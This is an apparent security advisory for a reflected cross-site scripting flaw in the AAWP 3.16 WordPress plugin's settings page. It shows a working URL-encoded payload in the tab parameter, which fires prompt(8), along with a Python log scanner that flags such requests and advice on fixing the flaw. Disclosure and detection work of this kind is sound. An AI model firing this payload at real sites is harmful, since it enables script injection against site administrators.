WordPress aawp 3.16 cross site scripting
2022-06-23 06:07:00 【Khan security team】
Vendor homepage: https://getaawp.com/
Software link: https://getaawp.com/
Version: 3.16
Tested on: Windows 10 - Chrome, WordPress 5.8.2
Proof of concept:
1- Install and activate the AAWP 3.16 plugin.
2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
3- Add the payload to the tab parameter. XSS payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
4- The XSS is triggered.
Going to the URL "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y" triggers the XSS.
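For detection, the following added example (not part of the original advisory and not AAWP code) scans web server access logs for requests to the aawp-settings page whose tab parameter is not a plain slug. The log lines are constructed, and the slug allowlist and the `general` tab name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate tab names are plain slugs (letters, digits, "_", "-").
SAFE_TAB = re.compile(r"[A-Za-z0-9_-]*")
# Request line as it appears in a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (addresses, times and the "general" tab are made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Jun/2022:06:01:10 +0000] "GET /wp-admin/admin.php?page=aawp-settings&tab=general HTTP/1.1" 200 5120',
    '203.0.113.9 - - [23/Jun/2022:06:02:44 +0000] "GET /wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y HTTP/1.1" 200 5301',
    '203.0.113.9 - - [23/Jun/2022:06:03:02 +0000] "GET /wp-admin/admin.php?page=other-plugin&tab=%3Cb%3E HTTP/1.1" 200 900',
    '203.0.113.7 - - [23/Jun/2022:06:04:15 +0000] "GET /wp-admin/admin.php?page=aawp-settings&tab=%2522x HTTP/1.1" 200 5120',
]

def suspicious_tab(line):
    """Return the URL-decoded tab value if the line is an aawp-settings
    request whose tab parameter is not a plain slug, otherwise None."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if "aawp-settings" not in params.get("page", []):
        return None
    for tab in params.get("tab", []):
        # parse_qs decodes once, so a double-encoded value still holds "%"
        # and fails the allowlist as well.
        if not SAFE_TAB.fullmatch(tab):
            return tab
    return None

def scan(lines):
    """Return (line_number, decoded_tab) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        tab = suspicious_tab(line)
        if tab is not None:
            hits.append((number, tab))
    return hits

if __name__ == "__main__":
    for number, tab in scan(SAMPLE_LOG):
        print(f"line {number}: unexpected tab value {tab!r}")
```

The same allowlist applied server-side before the tab value is written into the page, together with output encoding, addresses the issue at its source.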